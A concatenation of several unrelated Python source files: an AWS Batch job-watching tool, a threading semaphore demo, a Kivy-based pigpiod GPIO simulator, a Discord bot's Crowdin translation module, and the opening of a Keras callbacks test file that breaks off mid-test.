limits when monitoring batch jobs across many concurrent requests. A minimum delay of
1 second is subsequently applied.
Args:
job_id: the AWS batch job identifier
region_name: the AWS region
print_logs: true to print CloudWatch logs, false otherwise
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
"""
logger = logging.getLogger(__name__)
client: batch.Client = boto3.client(
service_name="batch", region_name=region_name # type: ignore
)
# Create the job
job: BatchJob = BatchJob.from_id(client=client, job_id=job_id)
logger.info(f"Watching job with name '{job.name}' and id '{job.job_id}'")
if print_logs:
_log_it(region_name=region_name, job=job, logger=logger, delay=delay)
if delay is None:
time.sleep(DEFAULT_LOGS_POLLING_INTERVAL)
else:
time.sleep(delay)
job.wait_on_complete(delay=delay)
end_status = job.get_status()
logger.info(
f"Job completed with name '{job.name}', id '{job.job_id}', and status '{end_status}'"
)
def run_job(
*,
job_definition: str,
name: Optional[str] = None,
region_name: Optional[str] = None,
print_logs: bool = True,
queue: Optional[str] = None,
cpus: Optional[int] = None,
mem_mb: Optional[int] = None,
command: List[str] = [],
parameters: Optional[Dict[str, Any]] = None,
environment: Optional[KeyValuePairTypeDef] = None,
watch_until: List[Status] = [],
after_success: bool = False,
delay: Optional[int] = None,
) -> None:
"""Submits a batch job and optionally waits for it to reach one of the given states.
This tool adds a small random jitter (+/-2 seconds) to the delay to help avoid AWS Batch API
limits when monitoring batch jobs across many concurrent requests. A minimum delay of
1 second is subsequently applied.
Args:
job_definition: the ARN for the AWS batch job definition, or the name of the job definition
to get the latest revision
name: the name of the job, otherwise one will be automatically generated
region_name: the AWS region
print_logs: true to print CloudWatch logs, false otherwise
queue: the name of the AWS batch queue
cpus: the number of CPUs to request
mem_mb: the amount of memory to request (in megabytes)
command: the command(s) to use
parameters: the (JSON) dictionary of parameters to use
environment: the (JSON) dictionary of environment variables to use
watch_until: watch until any of the given statuses are reached. If the job reaches a
status past all statuses, then an exception is thrown. For example, `Running` will
fail if `Succeeded` is reached, while `Succeeded` will fail if `Failed` is reached. To
wait for the job to complete regardless of status, use both `Succeeded` and `Failed`.
See the `--after-success` option to control this behavior.
after_success: true to treat states after the `watch_until` states as success, otherwise
failure.
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
"""
logger = logging.getLogger(__name__)
batch_client: batch.Client = boto3.client(
service_name="batch", region_name=region_name # type: ignore
)
job = BatchJob(
client=batch_client,
queue=queue,
job_definition=job_definition,
name=name,
cpus=cpus,
mem_mb=mem_mb,
command=command,
environment=None if environment is None else [environment],
parameters=parameters,
logger=logger,
)
# Submit the job
logger.info("Submitting job...")
job.submit()
logger.info(f"Job submitted with name '{job.name}' and id '{job.job_id}'")
# Optionally wait on it to complete
# Note: watch_until should be type Optional[List[Status]], but see:
# - https://github.com/anntzer/defopt/issues/83
if len(watch_until) > 0:
if print_logs:
_log_it(region_name=region_name, job=job, logger=logger, delay=delay)
# Wait for the job to reach one of the statuses
job.wait_on(
status_to_state=dict((status, True) for status in watch_until),
after_success=after_success,
delay=delay,
)
end_status: Status = job.get_status()
if print_logs and end_status.logs:
_watch_logs(region_name=region_name, job=job, logger=logger, indefinitely=False)
logger.info(
f"Job name '{job.name}' and id '{job.job_id}' reached status '" f"{end_status.status}'"
)
def _watch_logs(
region_name: str,
job: BatchJob,
logger: logging.Logger,
delay: Optional[int] = None,
polling_interval: int = DEFAULT_LOGS_POLLING_INTERVAL,
indefinitely: bool = True,
) -> None:
"""A method to watch logs.
Args:
region_name: the AWS region
job: the AWS batch job
logger: the logger to which logs should be printed
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
polling_interval: the default time to wait for new CloudWatch logs after no more logs are
returned
indefinitely: true to watch indefinitely, false to print only the available logs
"""
# wait until it's running to get the CloudWatch logs
job.wait_on_running(delay=delay)
client: Optional[logs.Client] = boto3.client(
service_name="logs", region_name=region_name # type: ignore
)
log: Log = Log(client=client, group=job.group, stream=job.stream)
try:
while True:
try:
for line in log:
logger.info(line)
except client.exceptions.ResourceNotFoundException:
logger.warning("The log stream has not been created, will try again.")
time.sleep(polling_interval)
log.reset()
if not indefinitely:
break
except Exception as ex:
logger.error(f"Encountered an exception while watching logs: {ex}")
raise ex
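# --- Illustrative sketch only (not part of pyfgaws) --------------------------
# The docstrings above describe adding a random +/-2 second jitter to the polling
# delay and then enforcing a 1 second minimum; a minimal version of that rule,
# with a hypothetical helper name, could look like this:
import random

def _example_jittered_delay(delay: float) -> float:
    """Apply +/-2s of jitter to `delay`, then clamp to a 1 second minimum."""
    return max(1.0, delay + random.uniform(-2.0, 2.0))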
|
threads_semaphore.py
|
"""
Semaphore. Limiting the number of threads executing at once.
Various examples exhibiting Thread use.
"""
from threading import Semaphore
from threading import Thread
from threading import current_thread
import logging
import os
import time
# Environment
ENV = os.environ.get("ENV") or "development"
LOG_LEVEL = os.environ.get("LOG_LEVEL") or "info"
# Configuration
DELAY = os.environ.get("DELAY") or "2"
# Logging
loggers = {"debug": logging.DEBUG, "info": logging.INFO, "error": logging.ERROR}
logging.basicConfig(level=loggers[LOG_LEVEL], format="%(asctime)-15s %(levelname)-8s %(message)s")
logger = logging.getLogger("synchronization")
logger.debug("Configuration...")
logger.debug("Environment => {}".format(ENV))
logger.debug("LOG LEVEL => {}".format(LOG_LEVEL))
logger.debug("DELAY => {} seconds".format(DELAY))
current_thread().setName("parent")
lock = Semaphore(5)
def sync(message: str):
"""Emulate Synchronization."""
logger.info("{} / id: {} /".format(current_thread().getName(), current_thread().ident))
for _ in range(5):
# Acquire the Lock
lock.acquire()
logger.info("{} => Checking In [ id: {} ]".format(current_thread().getName(), current_thread().ident))
# Synchronous Flow
logger.info("i {}".format(current_thread().getName()))
logger.info("am {}".format(current_thread().getName()))
logger.info("synchronous {}".format(current_thread().getName()))
logger.info("Message: {}".format(message))
time.sleep(1)
# Release the Lock
lock.release()
# Create Threads
t1 = Thread(target=sync, name="Lorem", args=("Lorem",))
t2 = Thread(target=sync, name="Ipsum", args=("Ipsum",))
t3 = Thread(target=sync, name="Dolor", args=("Dolor",))
t4 = Thread(target=sync, name="Sit", args=("Sit",))
t5 = Thread(target=sync, name="Ammet", args=("Ammet",))
# Invoke Threads
# First Come, First Serve
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
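# Optional addition (not in the original demo): joining the threads makes the
# parent thread block until all five workers have released the semaphore for
# the last time, giving the run a deterministic end.
for worker in (t1, t2, t3, t4, t5):
    worker.join()
logger.info("All worker threads finished")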
|
pigpiosim.py
|
#!/usr/bin/python3
import sys, os, socket, struct, pigpio, time, configparser
from threading import Thread, Event, Lock
from kivy.app import App
from kivy.lang.builder import Builder
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import mainthread
SCREEN = '''
<BorderLabel@Label>:
border_width: 1
border_color: (0.5, 0.5, 0.5, 1)
background_color: (0, 0, 0, 1)
canvas.before:
Color:
rgba: self.background_color
Rectangle:
pos: self.pos
size: self.size
Color:
rgba: self.border_color
Line:
width: self.border_width
rectangle: self.x, self.y, self.width, self.height
<Pin@BoxLayout>:
orientation: 'horizontal'
height: 22
size_hint_y: None
pin: ''
name: ''
<GPIOPin@Pin>:
mode: 'input'
io: ''
name: 'GPIO ' + self.io
<PinNumber@BorderLabel>:
width: 30
size_hint_x: None
<FixedPinL@Pin>:
pin_color: (0, 0, 0, 1)
label_color: (0, 0, 0, 1)
BorderLabel:
text: self.parent.name
background_color: self.parent.label_color
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
<FixedPinR@Pin>:
pin_color: (0, 0, 0, 1)
label_color: (0, 0, 0, 1)
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
BorderLabel:
text: self.parent.name
background_color: self.parent.label_color
<InputButton@Button>:
text: 'M'
font_size: '12sp'
width: 40 if self.parent.mode == 'input' else 0
size_hint_x: None if self.parent.mode == 'input' else 0
disabled: self.parent.mode != 'input'
opacity: 1 if self.parent.mode == 'input' else 0
on_press: self.parent.parent.toggleInput(self.parent)
on_release: self.parent.parent.toggleInput(self.parent)
<InputToggleButton@ToggleButton>:
text: 'T'
font_size: '12sp'
width: 40 if self.parent.mode == 'input' else 0
size_hint_x: None if self.parent.mode == 'input' else 0
disabled: self.parent.mode != 'input'
opacity: 1 if self.parent.mode == 'input' else 0
on_state: self.parent.parent.toggleInput(self.parent)
<OutputValue@BorderLabel>:
text: ''
<GPIOPinL@GPIOPin>:
pin_color: (0, 0.6, 0, 1)
label_color: (0, 0, 0, 1)
display_value: ''
BorderLabel:
id: label
text: self.parent.name
background_color: self.parent.label_color
InputButton:
InputToggleButton:
OutputValue:
text: self.parent.display_value
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
<GPIOPinR@GPIOPin>:
pin_color: (0, 0.6, 0, 1)
label_color: (0, 0, 0, 1)
display_value: ''
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
OutputValue:
text: self.parent.display_value
InputToggleButton:
InputButton:
BorderLabel:
id: label
text: self.parent.name
background_color: self.parent.label_color
<pigpioController>:
cols: 2
padding: 5
spacing: 5
FixedPinL:
pin: '1'
name: '3.3V'
pin_color: (0.8, 0, 0, 1)
FixedPinR:
pin: '2'
name: '5V'
pin_color: (0.8, 0, 0, 1)
GPIOPinL:
pin: '3'
io: '2'
FixedPinR:
pin: '4'
name: '5V'
pin_color: (0.8, 0, 0, 1)
GPIOPinL:
pin: '5'
io: '3'
FixedPinR:
pin: '6'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '7'
io: '4'
GPIOPinR:
pin: '8'
io: '14'
FixedPinL:
pin: '9'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinR:
pin: '10'
io: '15'
GPIOPinL:
pin: '11'
io: '17'
GPIOPinR:
pin: '12'
io: '18'
GPIOPinL:
pin: '13'
io: '27'
FixedPinR:
pin: '14'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '15'
io: '22'
GPIOPinR:
pin: '16'
io: '23'
FixedPinL:
pin: '17'
name: '3.3V'
pin_color: (0.8, 0, 0, 1)
GPIOPinR:
pin: '18'
io: '24'
GPIOPinL:
pin: '19'
io: '10'
FixedPinR:
pin: '20'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '21'
io: '9'
GPIOPinR:
pin: '22'
io: '25'
GPIOPinL:
pin: '23'
io: '11'
GPIOPinR:
pin: '24'
io: '8'
FixedPinL:
pin: '25'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinR:
pin: '26'
io: '7'
GPIOPinL:
pin: '27'
io: '0'
GPIOPinR:
pin: '28'
io: '1'
GPIOPinL:
pin: '29'
io: '5'
FixedPinR:
pin: '30'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '31'
io: '6'
GPIOPinR:
pin: '32'
io: '12'
GPIOPinL:
pin: '33'
io: '13'
FixedPinR:
pin: '34'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '35'
io: '19'
GPIOPinR:
pin: '36'
io: '16'
GPIOPinL:
pin: '37'
io: '26'
GPIOPinR:
pin: '38'
io: '20'
FixedPinL:
pin: '39'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinR:
pin: '40'
io: '21'
'''
class ClientException(Exception):
pass
class pigpioClient:
nextHandle = 0
def __init__(self, app, sock, addr):
self.app = app
self.sock = sock
self.addr = addr
self.handle = pigpioClient.nextHandle
pigpioClient.nextHandle = pigpioClient.nextHandle + 1
self.eventSequence = 0
self.lock = Lock()
self.sock.settimeout(None)
self.thread = Thread(target = self.loop, name = 'Client {}'.format(addr), daemon = True)
self.thread.start()
def loop(self):
while self.sock:
try:
buffer = self.sock.recv(16)
if not len(buffer): break
if len(buffer) != 16:
raise ClientException('incomplete command')
buffer = bytes(buffer)
cmdStruct = struct.unpack('4I', buffer)
extension = None
if cmdStruct[3]:
buffer = self.sock.recv(cmdStruct[3])
if len(buffer) != cmdStruct[3]:
raise ClientException('incomplete command extension')
extension = bytes(buffer)
self.processCommand(*cmdStruct, extension)
except ClientException as e:
print('Client {}: {}'.format(self.addr, e))
break
except IOError:
break
self.close()
def close(self):
if self.sock:
self.sock.close()
self.sock = None
print('Closed connection from {}'.format(self.addr))
self.app.removeClient(self)
def processCommand(self, cmd, p1, p2, p3, extension):
if cmd == pigpio._PI_CMD_BR1:
res = 0
for io in reversed(range(32)):
gpio = self.app.controller.getIO(io, False)
if gpio:
res = (res << 1) + (1 if gpio.value else 0)
self.sendResponse(res)
elif cmd == pigpio._PI_CMD_NOIB:
self.sendResponse(self.handle)
elif cmd == pigpio._PI_CMD_MODES:
gpio = self.app.controller.getIO(p1)
if p2 == pigpio.INPUT: mode = 'input'
elif p2 == pigpio.OUTPUT: mode = 'output'
else:
raise ClientException('unsupported mode {}'.format(p2))
gpio.set_mode(mode)
self.sendResponse()
elif cmd == pigpio._PI_CMD_NC: # stops notification on handle p1
self.sendResponse()
elif cmd == pigpio._PI_CMD_NB:
for io in reversed(range(32)):
gpio = self.app.controller.getIO(io, False)
if gpio:
gpio.setup_callback(p1, (p2 & (1 << io)) > 0)
self.sendResponse()
elif cmd == pigpio._PI_CMD_PUD:
gpio = self.app.controller.getIO(p1)
gpio.set_pullup(p2)
self.sendResponse()
elif cmd == pigpio._PI_CMD_FG:
self.sendResponse()
elif cmd == pigpio._PI_CMD_READ:
gpio = self.app.controller.getIO(p1)
self.sendResponse(1 if gpio.value else 0)
elif cmd == pigpio._PI_CMD_WRITE:
gpio = self.app.controller.getIO(p1)
gpio.set_value(p2 == pigpio.HIGH)
self.sendResponse()
elif cmd == pigpio._PI_CMD_PRS:
gpio = self.app.controller.getIO(p1)
gpio.set_pwm_range(p2)
self.sendResponse(gpio.pwmRange)
elif cmd == pigpio._PI_CMD_PWM:
gpio = self.app.controller.getIO(p1)
gpio.set_pwm_dutycycle(p2)
self.sendResponse()
elif cmd == pigpio._PI_CMD_PFS:
gpio = self.app.controller.getIO(p1)
gpio.set_pwm_frequency(p2)
self.sendResponse(gpio.pwmFrequency)
else:
raise ClientException('unknown command: {}'.format(cmd))
def sendResponse(self, res = 0):
with self.lock:
self.sock.send(struct.pack('4I', 0, 0, 0, res))
def sendEvent(self, flags, level):
with self.lock:
ticks = int(time.time() * 1000000) % (1 << 32)
self.sock.send(struct.pack('HHII', self.eventSequence, flags, ticks, level))
#print('sent event: {}, {}, {}, {}'.format(self.eventSequence, hex(flags), ticks, hex(level)))
self.eventSequence = (self.eventSequence + 1) % (1 << 16)
class GPIOPin:
def __init__(self, app, widget):
self.app = app
self.widget = widget
self.name = widget.name
self.pin = widget.pin
self.io = widget.io
self.mode = 'input'
self.bit = 1 << int(self.io)
self.pullup = pigpio.PUD_OFF
self.value = False
self.pwmRange = 255
self.pwmFrequency = 0
self.pwmDutycycle = 0
self.handles = []
if self.app.simConfig.has_option('labels', self.io):
widget.name = self.app.simConfig.get('labels', self.io)
self.update()
def add_handle(self, handle):
if handle not in self.handles:
self.handles.append(handle)
def remove_handle(self, handle):
if handle in self.handles:
self.handles.remove(handle)
def set_mode(self, mode):
if mode != self.mode:
self.mode = mode
if mode == 'input' and not isinstance(self.value, bool):
self.value = False
self.update()
print('GPIO {} mode set to {}'.format(self.io, self.mode))
def set_pullup(self, pullup):
self.pullup = pullup
self.update()
def set_value(self, value):
if value != self.value:
self.value = value
self.update()
print('GPIO {} value set to {}'.format(self.io, 'High' if self.value else 'Low'))
for handle in self.handles:
client = self.app.clientForHandle(handle)
if client:
client.sendEvent(0, self.bit if self.value else 0)
def toggle_value(self):
if isinstance(self.value, bool):
self.set_value(not self.value)
def setup_callback(self, handle, on):
if on:
self.add_handle(handle)
else:
self.remove_handle(handle)
print('GPIO {} callback turned {} for {}'.format(self.io, 'on' if handle in self.handles else 'off', handle))
def set_pwm_range(self, range):
self.pwmRange = range
self.pwmDutycycle = min(self.pwmDutycycle, self.pwmRange)
self.value = None
self.update()
print('GPIO {} PWM range set to {}'.format(self.io, self.pwmRange))
def set_pwm_dutycycle(self, dutycycle):
self.pwmDutycycle = max(min(dutycycle, self.pwmRange), 0)
self.set_mode('output')
self.value = None
self.update()
print('GPIO {} PWM dutycycle set to {}'.format(self.io, self.pwmDutycycle))
def set_pwm_frequency(self, frequency):
self.pwmFrequency = frequency
self.set_mode('output')
self.value = None
self.update()
print('GPIO {} PWM frequency set to {}'.format(self.io, self.pwmFrequency))
@mainthread
def update(self):
self.widget.mode = self.mode
if self.mode == 'input':
if self.pullup == pigpio.PUD_OFF:
pud = 'No pullup'
elif self.pullup == pigpio.PUD_UP:
pud = 'Pullup'
elif self.pullup == pigpio.PUD_DOWN:  # was PUD_OFF, which is already handled above
pud = 'Pulldown'
self.widget.display_value = '{}/{}'.format(pud, 'High' if self.value else 'Low')
else:
if isinstance(self.value, bool):
self.widget.display_value = 'High' if self.value else 'Low'
else:
self.widget.display_value = 'PWM {:0.0f}%/{}Hz'.format(100 * self.pwmDutycycle / self.pwmRange, self.pwmFrequency)
class pigpioController(GridLayout):
def __init__(self, app):
super().__init__()
self.app = app
self.ios = {}
for c in self.children:
if hasattr(c, 'mode'):
gpio = GPIOPin(app, c)
self.ios[c.io] = gpio
def toggleInput(self, widget):
gpio = self.getIO(widget.io)
if gpio:
gpio.toggle_value()
def getIO(self, io, raiseException = True):
io = str(io)
if io not in self.ios.keys():
if raiseException:
raise ClientException('unknown GPIO {}'.format(io))
return None
else:
return self.ios[io]
class pigpioApp(App):
title = 'pigpiod Simulator'
def __init__(self):
super().__init__()
self.serverThread = None
self.exitEvent = Event()
self.clients = []
self.controller = None
self.simConfig = configparser.ConfigParser(interpolation = None)
self.simConfig.optionxform = str # preserve option case
self.simConfig.clear()
if len(sys.argv) > 1:
self.simConfig.read(sys.argv[1])
def build(self):
Builder.load_string(SCREEN)
self.serverThread = Thread(target = self.serverLoop, name = 'Server', daemon = True)
self.serverThread.start()
self.controller = pigpioController(self)
return self.controller
def serverLoop(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1', 8888))
s.listen(2)
print('Waiting for connection...')
while not self.exitEvent.is_set():
sock, addr = s.accept()
print('Accepted connection from {}'.format(addr))
client = pigpioClient(self, sock, addr)
self.clients.append(client)
s.close()
for client in self.clients:
client.close()
self.removeClient(client)
def removeClient(self, client):
if client in self.clients:
self.clients.remove(client)
def clientForHandle(self, handle):
return next(iter([c for c in self.clients if c.handle == handle]), None)
if __name__ == '__main__':
app = pigpioApp()
try:
app.run()
except KeyboardInterrupt:
pass
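# --- Illustrative client-side sketch (not part of the simulator) -------------
# The simulator listens on 127.0.0.1:8888, so a standard pigpio client can talk
# to it exactly as it would to a real pigpiod instance. Defined here but never
# called; run it from a separate process while the simulator window is open.
def _example_client_session():
    pi = pigpio.pi('127.0.0.1', 8888)  # connects to the socket served above
    pi.set_mode(4, pigpio.OUTPUT)      # handled by the _PI_CMD_MODES branch
    pi.write(4, 1)                     # handled by the _PI_CMD_WRITE branch
    print(pi.read(4))                  # handled by the _PI_CMD_READ branch
    pi.stop()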
|
Translator.py
|
import asyncio
import hashlib
import json
import threading
import urllib.parse
import requests
from parsimonious import ParseError, VisitationError
from pyseeyou import format
from Util import Configuration, GearbotLogging, Emoji, Utils
LANGS = dict()
LANG_NAMES = dict(en_US= "English")
LANG_CODES = dict(English="en_US")
BOT = None
untranlatable = {"Sets a playing/streaming/listening/watching status", "Reloads all server configs from disk", "Reset the cache", "Make a role pingable for announcements", "Pulls from github so an upgrade can be performed without full restart", ''}
async def initialize(bot_in):
global BOT
BOT = bot_in
await load_codes()
await update_all()
for lang in LANG_CODES.values():
load_translations(lang)
def load_translations(lang):
LANGS[lang] = Utils.fetch_from_disk(f"lang/{lang}")
def translate(key, location, **kwargs):
lid = None
if location is not None:
if hasattr(location, "guild"):
location = location.guild
if location is not None and hasattr(location, "id"):
lid = location.id
else:
lid = location
if lid is None:
lang_key = "en_US"
else:
lang_key = Configuration.get_var(lid, "GENERAL", "LANG")
translated = key
if key not in LANGS[lang_key]:
if key not in untranlatable:
BOT.loop.create_task(tranlator_log('WARNING', f'Untranslatable string detected: {key}\n'))
untranlatable.add(key)
return key if key not in LANGS["en_US"] else format(LANGS['en_US'][key], kwargs, 'en_US')
try:
translated = format(LANGS[lang_key][key], kwargs, lang_key)
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt translation detected!\n**Lang code:** {lang_key}\n**Translation key:** {key}\n```\n{LANGS[lang_key][key]}```'))
GearbotLogging.exception("Corrupt translation", ex)
if key in LANGS["en_US"].keys():
try:
translated = format(LANGS['en_US'][key], kwargs, 'en_US')
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt English source string detected!\n**Translation key:** {key}\n```\n{LANGS["en_US"][key]}```'))
GearbotLogging.exception('Corrupt translation', ex)
return translated
def translate_by_code(key, code, **kwargs):
if key not in LANGS[code]:
return key
return format(LANGS[code][key], kwargs, code)
async def upload():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY="", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
new = hashlib.md5(open(f"lang/en_US.json", 'rb').read()).hexdigest()
old = Configuration.get_persistent_var('lang_hash', '')
if old == new:
return
Configuration.set_persistent_var('lang_hash', new)
message = await tranlator_log('REFRESH', 'Uploading translation file')
t = threading.Thread(target=upload_file)
t.start()
while t.is_alive():
await asyncio.sleep(1)
await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations file has been uploaded")
await update_all()
def upload_file():
data = {'files[/bot/commands.json]': open('lang/en_US.json', 'r')}
crowdin_data = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
reply = requests.post(f"https://api.crowdin.com/api/project/gearbot/update-file?login={crowdin_data['LOGIN']}&account-key={crowdin_data['KEY']}&json", files=data)
GearbotLogging.info(reply)
async def load_codes():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
GearbotLogging.info(f"Getting all translations from {t_info['SOURCE']}...")
# set the links for where to get stuff
if t_info["SOURCE"] == "CROWDIN":
list_link = f"https://api.crowdin.com/api/project/gearbot/status?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json"
else:
list_link = "https://gearbot.rocks/lang/langs.json"
async with BOT.aiosession.get(list_link) as resp:
info = await resp.json()
l = list()
for lang in info:
l.append(dict(name=lang["name"], code=lang["code"]))
LANG_NAMES[lang["code"]] = lang["name"]
LANG_CODES[lang["name"]] = lang["code"]
Utils.save_to_disk("lang/langs", l)
async def update_all():
futures = [update_lang(lang) for lang in LANG_CODES.values() if lang != "en_US"]
for chunk in Utils.chunks(futures, 20):
await asyncio.gather(*chunk)
async def update_lang(lang, retry=True):
t_info = Configuration.get_master_var("TRANSLATIONS")
if t_info["SOURCE"] == "DISABLED": return
if t_info["SOURCE"] == "CROWDIN":
download_link = f"https://api.crowdin.com/api/project/gearbot/export-file?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json&file={urllib.parse.quote('/bot/commands.json', safe='')}&language={lang}"
else:
download_link = f"https://gearbot.rocks/lang/{lang}.json"
GearbotLogging.info(f"Updating {lang} ({LANG_NAMES[lang]}) file...")
async with BOT.aiosession.get(download_link) as response:
content = await response.text()
content = json.loads(content)
if "success" in content:
if retry:
GearbotLogging.warn(f"Failed to update {lang} ({LANG_NAMES[lang]}), trying again in 3 seconds")
await asyncio.sleep(3)
await update_lang(lang, False)
else:
await tranlator_log('NO', f"Failed to update {lang} ({LANG_NAMES[lang]}) from {t_info['SOURCE']}")
return  # either way, don't fall through and cache the error payload as a translation file
Utils.save_to_disk(f'lang/{lang}', content)
LANGS[lang] = content
GearbotLogging.info(f"Updated {lang} ({LANG_NAMES[lang]})!")
async def tranlator_log(emoji, message, embed=None):
m = f'{Emoji.get_chat_emoji(emoji)} {message}'
return await get_translator_log_channel()(m, embed=embed)
def get_translator_log_channel():
crowdin = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
channel = BOT.get_channel(crowdin["CHANNEL"]) if crowdin is not None else None
return channel.send if channel is not None else GearbotLogging.bot_log
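# --- Illustrative sketch only (not part of GearBot) --------------------------
# translate() above renders ICU MessageFormat strings with pyseeyou's
# format(template, values, locale); the template below is a made-up example,
# not a real translation key from lang/en_US.json.
def _example_render():
    template = "{count, plural, one {# warning} other {# warnings}} for {user}"
    return format(template, {"count": 2, "user": "example"}, "en_US")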
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
import tensorflow.compat.v2 as tf
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from unittest import mock
from absl.testing import parameterized
import numpy as np
import keras
from keras import keras_parameterized
from keras import testing_utils
from keras.callbacks import BackupAndRestore
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizer_v2 import gradient_descent
from keras.optimizer_v2 import learning_rate_schedule
from keras.utils import np_utils
from tensorflow.python.platform import tf_logging as logging
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
CALLBACK_HOOKS = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of times each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
for method_name in CALLBACK_HOOKS:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
class CallAllHooks(keras.callbacks.Callback):
"""A callback that calls self._run for all hooks"""
def __init__(self):
for method_name in CALLBACK_HOOKS:
setattr(self, method_name, self._run)
def _run(self, *args, logs=None):
raise NotImplementedError
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
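# Illustrative sketch (not one of the original tests): Counter swaps every hook
# for a counting wrapper at construction time, so invoking a hook directly is
# enough to bump its entry in method_counts.
def _example_counter_usage():
    counter = Counter()
    counter.on_epoch_begin(0)
    counter.on_epoch_begin(1)
    return counter.method_counts['on_epoch_begin']  # -> 2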
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
